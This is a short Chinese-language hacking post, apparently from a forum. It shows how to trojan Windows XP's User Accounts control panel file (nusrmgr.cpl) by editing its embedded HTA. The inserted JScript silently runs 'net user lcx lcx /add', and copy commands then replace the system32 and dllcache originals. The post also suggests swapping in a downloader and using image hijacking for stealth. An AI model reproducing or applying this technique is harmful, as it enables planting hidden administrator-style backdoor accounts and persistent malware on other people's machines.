先請看圖
這是我用restorator 打開nusrmgr.cpl時的情形。你看到了什麼?是不是很吃驚,原來xp中控制面板中的“用戶帳戶”選項竟然是html做的。其實不然,微軟的好多組件的面板都是html做的。這也是微軟爲什麼一直無法清掉ie的原因,它牽涉太多了,就算是反壟斷法也不可能讓微軟刪掉ie的。
看到圖中的那個NUSRMGR.HTA文件了嗎?我們可以用它來做下手腳(當然你選別的js文件也是可以的)
我們在裏邊加幾行js語句:
var WshShell = CreateObject("WScript.Shell")
WshShell.Run("net.exe user lcx lcx /add", 0, true)
當然你加下載者更好,我只是做個示例。
然後:
echo y|copy nusrmgr.cpl c:\windows\system32\dllcache\nusrmgr.cpl
echo y|copy nusrmgr.cpl c:\windows\system32\nusrmgr.cpl
替換原來的文件。這樣以後用戶再調用控制面板裏的“用戶帳戶”選項後,就會自動給你加一個帳戶了。
這算是一個思路了,應當很雞肋。如果要完美一點,可以查看一下別的cpl文件如何更改,如何無聲無息的替掉原來的文件(如鏡像劫持)。